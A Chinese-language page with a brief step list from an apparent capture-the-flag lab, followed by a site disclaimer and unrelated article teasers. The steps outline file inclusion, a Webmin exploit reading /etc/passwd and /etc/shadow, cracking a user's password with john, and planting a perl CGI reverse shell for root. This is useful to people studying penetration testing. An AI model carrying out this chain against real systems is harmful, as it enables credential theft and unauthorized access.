80 端口发现 文件包含,可读到 /etc/passwd,但是没有读到 /etc/shadow
漏洞脚本扫描结合浏览器访问观察,发现 10000 端口运行 webmin,搜索漏洞脚本利用
使用 perl 脚本读取 /etc/passwd 和 /etc/shadow 内容,使用 john 破解 shadow,拿到 vmware 用户的明文密码
使用 ssh 登录,期间配置 ssh 参数。获得初级 shell,观察无 sudo 权限,尝试提权
信息收集发现系统的 /var/www 和 /var/webmin 由 root 用户创建,权限较高,考虑尝试反弹perl cgi 反弹 shell
kali 用 php 开一个临时服务器,放上构造好的 perl CGI shell,并监听端口
shell 使用 wget 下载 反弹 shell shell.cgi,使用之前的 webmin perl 利用脚本请求 shell.cgi 的地址,因为这个脚本可以指定服务器内路径访问文件
拿到 root shell,结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/54472.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

阿里云ACP认证考试题库

最近有好些同学&#xff0c;考完阿里云ACP了&#xff0c;再来跟我反馈&#xff1a;自己花700买的阿里云ACP题库&#xff0c;结果答案是错的&#xff01; 或者考完后发现&#xff0c;买的阿里云ACP题库覆盖率只有50%&#xff01; 为避免大家继续踩坑&#xff0c;给大家分享一个阿…

qt使用QDomDocument读写xml文件

在使用QDomDocument读写xml之前需要在工程文件添加&#xff1a; QT xml 1.生成xml文件 void createXml(QString xmlName) {QFile file(xmlName);if (!file.open(QIODevice::WriteOnly | QIODevice::Truncate |QIODevice::Text))return false;QDomDocument doc;QDomProcessin…

使用 Python 遍历文件夹

要解决这个问题&#xff0c;使用 Python 的标准库可以很好地完成。我们要做的是遍历目录树&#xff0c;找到所有的 text 文件&#xff0c;读取内容&#xff0c;处理空行和空格&#xff0c;并将处理后的内容合并到一个新的文件中。 整体思路&#xff1a; 遍历子目录&#xff1…

【目标检测】工程机械车辆数据集2690张4类VOC+YOLO格式

数据集格式&#xff1a;Pascal VOC格式YOLO格式(不包含分割路径的txt文件&#xff0c;仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)&#xff1a;2694 标注数量(xml文件个数)&#xff1a;2694 标注数量(txt文件个数)&#xff1a;2694 标注…

舞韵流转:SpringBoot实现古典舞在线交流新体验

第二章 相关技术介绍 2.1Java技术 Java是一种非常常用的编程语言&#xff0c;在全球编程语言排行版上总是前三。在方兴未艾的计算机技术发展历程中&#xff0c;Java的身影无处不在&#xff0c;并且拥有旺盛的生命力。Java的跨平台能力十分强大&#xff0c;只需一次编译&#xf…

Oracle架构之物理存储之日志文件

文章目录 1 日志文件1.1 重做日志文件&#xff08;Redo Log Files&#xff09;1.1.1 定义1.1.2 联机日志的相关概念1.1.3 动态性能视图1.1.4 手工切换日志1.1.5 添加日志文件组和日志组成员1.1.6 删除日志组和日志组成员1.1.6.1 前言1.1.6.2 删除日志组1.1.6.3 删除日志组成员 …

Star 3w+,向更安全、更泛化、更云原生的 Nacos3.0 演进

作者&#xff1a;席翁 Nacos 社区刚刚迎来了 Star 突破 30000 的里程碑&#xff0c;从此迈上了一个新的阶段。感谢大家的一路支持、信任和帮助&#xff01; Nacos /nɑ:kəʊs/是 Dynamic Naming and Configuration Service 的首字母简称&#xff0c;定位于一个更易于构建云原…

Linux网络编程 -- 网络基础

本文主要介绍网络的一些基础概念&#xff0c;不涉及具体的操作原理&#xff0c;旨在构建对网络的基础认识。 1、网络的早期发展历程 20世纪50年代 在这一时期&#xff0c;计算机主机非常昂贵&#xff0c;而通信线路和设备相对便宜。为了共享计算机主机资源和进行信息的综合处…

关于CSS 案例_新闻内容展示

新闻要求 标题:居中加粗发布日期: 右对齐分割线: 提示, 可以使用 hr 标签正文/段落: 左侧缩进插图: 居中显示 展示效果 审核过不了&#xff0c;内容没填大家将就着看吧。 代码 <!DOCTYPE html> <html lang"en"> <head><meta charset&qu…

JavaScript 根据时间先后排序数组

在 JavaScript 中&#xff0c;你可以使用数组的 sort() 方法来根据时间先后对数组进行排序。假设你的数组中的每个元素都是一个对象&#xff0c;并且这些对象都有一个表示时间的属性&#xff08;例如&#xff0c;一个 ISO 格式的字符串、时间戳或 Date 对象&#xff09;&#x…

python-pptx 中 placeholder 和 shape 有什么区别?

在 python-pptx 库中&#xff0c;placeholder 和 shape 是两个核心概念。虽然它们看起来相似&#xff0c;但在功能和作用上存在显著的区别。为了更好地理解这两个概念&#xff0c;我们可以通过它们的定义、使用场景以及实际代码示例来剖析其差异。 Python-pptx 的官网链接&…

LeetCode 228 Summary Ranges 解题思路和python代码

题目&#xff1a; You are given a sorted unique integer array nums. A range [a,b] is the set of all integers from a to b (inclusive). Return the smallest sorted list of ranges that cover all the numbers in the array exactly. That is, each element of nums …

【GO实战课】第四讲:电子商务网站(4)商品展示和购物车实现

1. 简介 本讲将探讨电子商务网站的商品展示和购物车功能,以及使用GO语言实现。我们将介绍如何设计一个可扩展、可靠和高性能的商品展示和购物车系统,并演示如何使用GO语言编写相关代码。 本课程的目标是帮助学生理解电子商务网站的商品展示和购物车功能,并提供一个实际的项…

【Java】六大设计原则和23种设计模式

目录 一、JAVA六大设计原则 二、JAVA23种设计模式 1. 创建型模式 2. 结构型模式 3. 行为型模式 三、设计原则与设计模式 1. 设计原则 2. 设计模式 四、单例模式 1. 饿汉式 2. 懒汉式 四、代理模式 1. 什么是代理模式 2. 为什么要用代理模式 3. 有哪几种代理模式 …

服务器几核几G几M是什么意思?如何选择?

服务器几核几G几M是什么意思&#xff1f;我们建站、搭建网络平台都要用到云服务器&#xff0c;不管在腾讯云、阿里云还是别的云服务平台选购&#xff0c;都会接触到服务器配置。云服务器就是把物理服务器&#xff08;俗称“母鸡”&#xff09;&#xff0c;用虚拟机技术虚拟出多…

Android SystemUI组件(09)唤醒亮屏 锁屏处理流程

该系列文章总纲链接&#xff1a;专题分纲目录 Android SystemUI组件 本章关键点总结 & 说明&#xff1a; 说明&#xff1a;本章节持续迭代之前章节的思维导图&#xff0c;主要关注左侧上方锁屏分析部分 唤醒亮屏 即可。 Power按键的处理逻辑最终是由PhoneWindowManager来…

数据可视化基础:让数据说话

一、引言 在信息洪流中&#xff0c;数据可视化如同灯塔&#xff0c;照亮了数据的海洋&#xff0c;让我们能够洞察数据背后的意 义。 下面是对数据可视化的详细介绍&#xff0c;包括定义、作用、类型、原则、工具方法以及应用场景&#xff0c; 并附上具体的代码示例。 二、数…

BUSHOUND的抓包使用详解

BUSHOUND是个过滤软件&#xff0c;确切来说是在windows操作系统它的驱动层USB传输的数据。所以这个数据上可能是与USB的总线上的数据是有一点差异的。 先要选择设备的抓包。所以就是在device这个界面底下&#xff0c;我们首先要选择我们要抓的设备。 尝试下键盘设备 电脑键盘…

mmdetection实战,训练自己的数据集

1 库安装 pip install timm1.0.7 thop efficientnet_pytorch0.7.1 einops grad-cam1.4.8 dill0.3.6 albumentations1.4.11 pytorch_wavelets1.3.0 tidecv PyWavelets -i https://pypi.tuna.tsinghua.edu.cn/simplepip install -U openmim -i https://pypi.tuna.tsinghua.edu.cn…

在Kali Linux中使用VNC和iptables配置xrdp以实现远程连接

在Kali Linux中&#xff0c;使用VNC和iptables配置xrdp以实现远程连接涉及几个步骤。不过&#xff0c;值得注意的是&#xff0c;VNC和xrdp是两种不同的远程桌面协议&#xff0c;它们通常不会在同一配置中同时使用&#xff08;除非有特殊的网络架构需求&#xff09;。然而&#…